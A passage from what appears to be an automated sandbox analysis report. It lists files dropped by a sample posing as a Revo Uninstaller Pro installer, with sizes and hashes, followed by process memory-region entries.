      99f4ce7532a5ac71e47de3e43457db1a23227153eea7188d0ec7c4f853b8132ee5ba5828d4fffed040709722f532f19992f4fdbb8261df58c6e9f85fc89beb27

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      e76c39db445edb5e1a4d1ec43e5567d0

      SHA1

      be398199fa043840a69b17fe545b9b4ca8dc35ab

      SHA256

      5ea7746b6096f671aae5f55739cacfb28fee391cc4ef2d8774b2e1d3398c06c6

      SHA512

      fe3a17fcdfe275d3cbd44d3afea97034c17f3fd88d7c2247b4369fe9b24372e9f1dbc732f4cb6b0196eef5aca0f55b8b5076f0f0d81f1c976981ff2ab5feccf8

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      1c7a7ac4d02de7177598e568cd1cf811

      SHA1

      a72c865aca9bb5034cb5b9f56101cb330653c61d

      SHA256

      d3bf5a804a6d2d95837e77f97201cbaec19bb44672d1da9e6e20f29cb2b30d7e

      SHA512

      4f50baff10680af724e45f69e448cec786dbea3d9c4c2f0f99bf6250f967de6bbd181a775e4280261505b7b0a03f97498065533314d23fbdd59064b8037225df

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      69e8bd332cc3ba76ca61bed2edc9759b

      SHA1

      a1c669b40ec3b1d77c1d8c553a052180d56cbc0b

      SHA256

      e9bf7274c49093fe06b4e6d46157f147810ab5906672c0c7bed5d3034fdc2e3a

      SHA512

      17d29612420080a16c6e4d59e8220eec106e308dfa4262c8835ba3cd9f47cd2c1a2538292568767a33a8917ea84029ca9c87a6167b858c19bc10b3a0b05bff72

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      b05f5ec99e746efdb7dd9751579575d4

      SHA1

      07a3d6e33e7eb86404ed4b87ee7ad09899689e14

      SHA256

      a74004fe2aa75c4eee13fae7f6fc18ae9904239b214a3eac6779b6d6513d2488

      SHA512

      fd370f79dedcbd5f321bd87d273d2b098f94b243bff75adee6805495f16222ca54c4ba2bc39abb1618d1a2c87b162340b395dfc3b4dd39eeadd4425d407635c0

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      c5a13c0d8b66ec62c774da9617d8b1fb

      SHA1

      17b1c8c5e9b29afe680c0675aac15712111ccc7a

      SHA256

      00ae712813cbadc4486db634b5524db7d5f5ff9680f5b0f588c2c90d03fd3316

      SHA512

      b0306fb83c35661fa9996674b9657d4b5fb593313ca4d299f92bb71e5b4e3770d79e7a3f166cbbd86b0b948d19a1d41117da5ce982f6dafdbd1731f09948833a

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      f4dd70c385c79cc5ebda9fe89100f210

      SHA1

      39b66e96adf422d6ce14416b291a8104a779261c

      SHA256

      1753d46a9bc3658056b8aa36a8a26cf7101dca212507a4f07cacca013afc9759

      SHA512

      64050203a854fe2fd366e1a81ecbe18e7da1eba98b44412fa4f369a51faa648f466ae510d872877d428d585e47082baf479d235b8d0d595e67176a2bdf69ab40

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      4121c28f824fbc2d46c627f886c635da

      SHA1

      5137783aa9254147be2500b3f325e48fe700399d

      SHA256

      3e642f6f08a38ca17830880b2e11441b5dfa0ca1933ffcad96a1011f2c2c3777

      SHA512

      12351b348a1e4d86da96036a280c62917e6297e88faddb145b8176f0afd31b36667675db2c928729977c50645107d0ec6406ac3b09689a85c8ae6b1e6db4b288

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      3bf3cf2a1f9dfa39053a2e52efd53d4c

      SHA1

      efe9fa8ceae3f0f9b8d2d5c6eed17b78ccfd6ed9

      SHA256

      5a9671e65d4f22e2b592c14b6b18c08a88579363fc34dd0a7af952fa515287c1

      SHA512

      9ed2515f428ac04f30098038dc73bb9f6eab5cb222408990652ccb4ba6c77fb05223dc6c01b200033279d043838562d05b4c6511975d878f57112c723107022e

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      e981a9b06aab254a64a5c2b07ee4c188

      SHA1

      e87ef6195e019ea175c3be781597a2972abab9d2

      SHA256

      82ba303d4ad497e690525fd2bb40ceafea797dc73fdee4820df6860f711c392c

      SHA512

      d0aca64c2f61cb941103cd1fbf1d4732b9135f9657c601210bb413b9c7286b4d1a253bfbd277c066500a365111367ade6b830ae0d4e7e7721efa98e5b7c65ecb

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      0dd66ce57443547d10c5f39ea090cf9d

      SHA1

      9c3c27cf8c3a8b4d6dc6666e746a0b65df4ed270

      SHA256

      b4fe650da01824398666a7dbe6bc862f1580369035a274b1ed6e0842d9d82054

      SHA512

      f552d53bb3e0d56da03a4965a7646a9b02ba9625411058cd67e20e62d9a4ef5ce9492f82e365e79de768e5ebedc5b565c34943efb03a10726ef5108ad69bc356

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pyjodul3.kdv.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp

      Filesize

      982KB

      MD5

      74f1186a6d3bc01716681712c6b24a74

      SHA1

      9c015d4a4d4a9c7ee4619ea2e2068143c3b81e18

      SHA256

      d4c2a4940f43e5bdab3963fb2a357f52ae6866e6dc4426909f828b2228af814d

      SHA512

      bea8504e1b2244ac425cde33a34d6ac5e6f77d75050c6646d7abebbdaf9d0eab91ca7e4e41abea2aed9c55c445d1c924a62d46a9b08bfe81661982fdf14e20e0

    • C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp

      Filesize

      2.5MB

      MD5

      d0e24e6d7017127bea02bb0160229bee

      SHA1

      34350e5b7f268797b2a7ec56390c2228f841b37b

      SHA256

      ca0a5b43e255d0fa7205be3437ea706eda966dd1839ae01d1de1d3b62f832994

      SHA512

      f5c2edc35c2e43e199c2d4d1d904d9b06cc238b99a6f691f5a9c820c8ed0db77346158ae41237f0086a5009012202bdab4b533b42223f72837c461a499be5c86

    • C:\Users\Admin\AppData\Local\Temp\is-F7UCB.tmp\_isetup\_iscrypt.dll

      Filesize

      2KB

      MD5

      a69559718ab506675e907fe49deb71e9

      SHA1

      bc8f404ffdb1960b50c12ff9413c893b56f2e36f

      SHA256

      2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

      SHA512

      e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

    • C:\Users\Admin\AppData\Local\Temp\is-H594I.tmp\b2p.dll

      Filesize

      22KB

      MD5

      ab35386487b343e3e82dbd2671ff9dab

      SHA1

      03591d07aea3309b631a7d3a6e20a92653e199b8

      SHA256

      c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2

      SHA512

      b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09

    • C:\Users\Admin\AppData\Local\Temp\is-H594I.tmp\botva2.dll

      Filesize

      37KB

      MD5

      67965a5957a61867d661f05ae1f4773e

      SHA1

      f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

      SHA256

      450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

      SHA512

      c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

    • C:\Users\Admin\AppData\Local\Temp\is-H594I.tmp\iswin7logo.dll

      Filesize

      39KB

      MD5

      1ea948aad25ddd347d9b80bef6df9779

      SHA1

      0be971e67a6c3b1297e572d97c14f74b05dafed3

      SHA256

      30eb67bdd71d3a359819a72990029269672d52f597a2d1084d838caae91a6488

      SHA512

      f2cc5dce9754622f5a40c1ca20b4f00ac01197b8401fd4bd888bfdd296a43ca91a3ca261d0e9e01ee51591666d2852e34cee80badadcb77511b8a7ae72630545

    • C:\Users\Admin\AppData\Local\VS Revo Group\Revo Uninstaller Pro\data\cachedata.dat

      Filesize

      42KB

      MD5

      d1d1e40ea4d3ed2a8d5def030a67e025

      SHA1

      0ec1c6fd519d9cd0d89b0b0d86b8b74c356fbe3c

      SHA256

      42d33b63bce3350ade857c571d281e013c2b2b28d42f7ddf509d57c596ef0088

      SHA512

      94c27ba0d16e653a25c8e1c488a1d35a020b4b932d4c8953a0ecce6ceba5c153718a4eb46cbfca3169a008c0387b16f6b02d8806d4711d9d6bb3ad015ee8bd32

    • C:\Windows\System32\drivers\revoflt.sys

      Filesize

      39KB

      MD5

      498c3d4d44382a96812a0e0ff28d575b

      SHA1

      c34586b789ca5fe4336ab23ad6ff6eeb991c9612

      SHA256

      23cb784547268cf775636b07cac4c00b962fd10a7f9144d5d5886a9166919bba

      SHA512

      ce450128e9ca1675eab8aa734dc907dfc55f3dacd62503339080d6bd47b2523d063786dbe28e6833db041f1d5869670be2411a39c7b8d93d05a98b4c09cad1a1

    • memory/636-184-0x0000000006BC0000-0x0000000006BE2000-memory.dmp

      Filesize

      136KB

    • memory/636-185-0x0000000007F50000-0x00000000084F4000-memory.dmp

      Filesize

      5.6MB

    • memory/964-239-0x000000006F6E0000-0x000000006F72C000-memory.dmp

      Filesize

      304KB

    • memory/1136-260-0x000000006F6E0000-0x000000006F72C000-memory.dmp

      Filesize

      304KB

    • memory/1184-580-0x0000000000400000-0x0000000000E32000-memory.dmp

      Filesize

      10.2MB

    • memory/1200-197-0x000000006F6E0000-0x000000006F72C000-memory.dmp

      Filesize

      304KB

    • memory/1520-408-0x000000006F6E0000-0x000000006F72C000-memory.dmp

      Filesize

      304KB

    • memory/1572-113-0x00000000075F0000-0x0000000007686000-memory.dmp

      Filesize

      600KB

    • memory/1572-94-0x0000000005B40000-0x0000000005E94000-memory.dmp

      Filesize

      3.3MB

    • memory/1572-111-0x0000000007370000-0x000000000738A000-memory.dmp

      Filesize

      104KB

    • memory/1572-112-0x00000000073E0000-0x00000000073EA000-memory.dmp

      Filesize

      40KB

    • memory/1572-80-0x0000000004AA0000-0x0000000004AD6000-memory.dmp

      Filesize

      216KB

    • memory/1572-81-0x0000000005130000-0x0000000005758000-memory.dmp

      Filesize

      6.2MB

    • memory/1572-117-0x00000000076B0000-0x00000000076CA000-memory.dmp

      Filesize

      104KB

    • memory/1572-114-0x0000000007570000-0x0000000007581000-memory.dmp

      Filesize

      68KB

    • memory/1572-110-0x00000000079B0000-0x000000000802A000-memory.dmp

      Filesize

      6.5MB

    • memory/1572-115-0x00000000075A0000-0x00000000075AE000-memory.dmp

      Filesize

      56KB

    • memory/1572-109-0x0000000007050000-0x00000000070F3000-memory.dmp

      Filesize

      652KB

    • memory/1572-82-0x0000000004F80000-0x0000000004FA2000-memory.dmp

      Filesize

      136KB

    • memory/1572-108-0x0000000006610000-0x000000000662E000-memory.dmp

      Filesize

      120KB

    • memory/1572-83-0x0000000005860000-0x00000000058C6000-memory.dmp

      Filesize

      408KB

    • memory/1572-95-0x0000000006040000-0x000000000605E000-memory.dmp

      Filesize

      120KB

    • memory/1572-118-0x0000000007690000-0x0000000007698000-memory.dmp

      Filesize

      32KB

    • memory/1572-98-0x000000006F6E0000-0x000000006F72C000-memory.dmp

      Filesize

      304KB

    • memory/1572-84-0x00000000059C0000-0x0000000005A26000-memory.dmp

      Filesize

      408KB

    • memory/1572-96-0x00000000060E0000-0x000000000612C000-memory.dmp

      Filesize

      304KB

    • memory/1572-97-0x0000000007010000-0x0000000007042000-memory.dmp

      Filesize

      200KB

    • memory/1572-116-0x00000000075B0000-0x00000000075C4000-memory.dmp

      Filesize

      80KB

    • memory/2012-456-0x000000006F6E0000-0x000000006F72C000-memory.dmp

      Filesize

      304KB

    • memory/2012-466-0x00000000079D0000-0x0000000007A73000-memory.dmp

      Filesize

      652KB

    • memory/2012-471-0x0000000007E60000-0x0000000007E71000-memory.dmp

      Filesize

      68KB

    • memory/2012-472-0x0000000007EA0000-0x0000000007EB4000-memory.dmp

      Filesize

      80KB

    • memory/2596-501-0x0000000000400000-0x0000000000E32000-memory.dmp

      Filesize

      10.2MB

    • memory/2752-679-0x0000000000400000-0x0000000000495000-memory.dmp

      Filesize

      596KB

    • memory/2752-681-0x0000000000400000-0x0000000000495000-memory.dmp

      Filesize

      596KB

    • memory/2880-528-0x000000006F6E0000-0x000000006F72C000-memory.dmp

      Filesize

      304KB

    • memory/2932-285-0x0000000005E60000-0x00000000061B4000-memory.dmp

      Filesize

      3.3MB

    • memory/2932-388-0x0000000007AA0000-0x0000000007AB4000-memory.dmp

      Filesize

      80KB

    • memory/2932-287-0x000000006F700000-0x000000006F74C000-memory.dmp

      Filesize

      304KB

    • memory/3340-71-0x0000000075660000-0x0000000075671000-memory.dmp

      Filesize

      68KB

    • memory/3340-56-0x00000000748B0000-0x00000000748CB000-memory.dmp

      Filesize

      108KB

    • memory/3340-75-0x0000000007390000-0x000000000739F000-memory.dmp

      Filesize

      60KB

    • memory/3340-262-0x0000000000400000-0x0000000000509000-memory.dmp

      Filesize

      1.0MB

    • memory/3340-160-0x00000000748B0000-0x00000000748CB000-memory.dmp

      Filesize

      108KB

    • memory/3340-511-0x00000000748B0000-0x00000000748CB000-memory.dmp

      Filesize

      108KB

    • memory/3340-159-0x0000000000400000-0x0000000000509000-memory.dmp

      Filesize

      1.0MB

    • memory/3340-510-0x0000000000400000-0x0000000000509000-memory.dmp

      Filesize

      1.0MB

    • memory/3340-162-0x0000000007390000-0x000000000739F000-memory.dmp

      Filesize

      60KB

    • memory/3340-562-0x0000000000400000-0x0000000000509000-memory.dmp

      Filesize

      1.0MB

    • memory/3340-161-0x0000000075660000-0x0000000075671000-memory.dmp

      Filesize

      68KB

    • memory/3464-565-0x000000006F6E0000-0x000000006F72C000-memory.dmp

      Filesize

      304KB

    • memory/3464-575-0x0000000007050000-0x00000000070F3000-memory.dmp

      Filesize

      652KB

    • memory/3464-576-0x0000000007300000-0x0000000007311000-memory.dmp

      Filesize

      68KB

    • memory/3464-578-0x0000000007350000-0x0000000007364000-memory.dmp

      Filesize

      80KB

    • memory/3856-218-0x000000006F6E0000-0x000000006F72C000-memory.dmp

      Filesize

      304KB

    • memory/3948-33-0x0000000000400000-0x0000000000429000-memory.dmp

      Filesize

      164KB

    • memory/3948-146-0x0000000000400000-0x0000000000429000-memory.dmp

      Filesize

      164KB

    • memory/3948-563-0x0000000000400000-0x0000000000429000-memory.dmp

      Filesize

      164KB

    • memory/3996-609-0x0000000007540000-0x0000000007551000-memory.dmp

      Filesize

      68KB

    • memory/3996-598-0x00000000747B0000-0x00000000747FC000-memory.dmp

      Filesize

      304KB

    • memory/3996-608-0x0000000007290000-0x0000000007333000-memory.dmp

      Filesize

      652KB

    • memory/3996-596-0x0000000006580000-0x00000000065CC000-memory.dmp

      Filesize

      304KB

    • memory/3996-610-0x0000000007580000-0x0000000007594000-memory.dmp

      Filesize

      80KB

    • memory/3996-581-0x0000000005970000-0x0000000005CC4000-memory.dmp

      Filesize

      3.3MB

    • memory/4072-516-0x0000000007460000-0x0000000007474000-memory.dmp

      Filesize

      80KB

    • memory/4072-506-0x0000000007420000-0x0000000007431000-memory.dmp

      Filesize

      68KB

    • memory/4072-500-0x00000000070E0000-0x0000000007183000-memory.dmp

      Filesize

      652KB

    • memory/4072-490-0x000000006F6E0000-0x000000006F72C000-memory.dmp

      Filesize

      304KB

    • memory/4092-2-0x0000000000401000-0x00000000004A9000-memory.dmp

      Filesize

      672KB

    • memory/4092-0-0x0000000000400000-0x00000000004CE000-memory.dmp

      Filesize

      824KB

    • memory/4092-68-0x0000000000400000-0x00000000004CE000-memory.dmp

      Filesize

      824KB

    • memory/4312-144-0x00000000077B0000-0x0000000007853000-memory.dmp

      Filesize

      652KB

    • memory/4312-145-0x0000000007A60000-0x0000000007A71000-memory.dmp

      Filesize

      68KB

    • memory/4312-134-0x000000006F700000-0x000000006F74C000-memory.dmp

      Filesize

      304KB

    • memory/4312-133-0x0000000006970000-0x00000000069BC000-memory.dmp

      Filesize

      304KB

    • memory/4312-131-0x0000000005FB0000-0x0000000006304000-memory.dmp

      Filesize

      3.3MB

    • memory/4540-51-0x0000000000400000-0x0000000000689000-memory.dmp

      Filesize

      2.5MB

    • memory/4540-6-0x0000000000400000-0x0000000000689000-memory.dmp

      Filesize

      2.5MB

    • memory/4612-673-0x0000000005360000-0x000000000536A000-memory.dmp

      Filesize

      40KB

    • memory/4612-670-0x00000000008A0000-0x00000000009CE000-memory.dmp

      Filesize

      1.2MB

    • memory/4612-671-0x0000000005280000-0x0000000005312000-memory.dmp

      Filesize

      584KB

    • memory/4612-672-0x00000000053C0000-0x000000000545C000-memory.dmp

      Filesize

      624KB

    • memory/4612-674-0x0000000005800000-0x000000000581A000-memory.dmp

      Filesize

      104KB

    • memory/4612-675-0x0000000007060000-0x0000000007150000-memory.dmp

      Filesize

      960KB

    • memory/4612-676-0x0000000009740000-0x00000000097D8000-memory.dmp

      Filesize

      608KB

    • memory/4692-622-0x00000000747B0000-0x00000000747FC000-memory.dmp

      Filesize

      304KB

    • memory/4692-150-0x0000000005830000-0x0000000005B84000-memory.dmp

      Filesize

      3.3MB

    • memory/4692-163-0x000000006F6E0000-0x000000006F72C000-memory.dmp

      Filesize

      304KB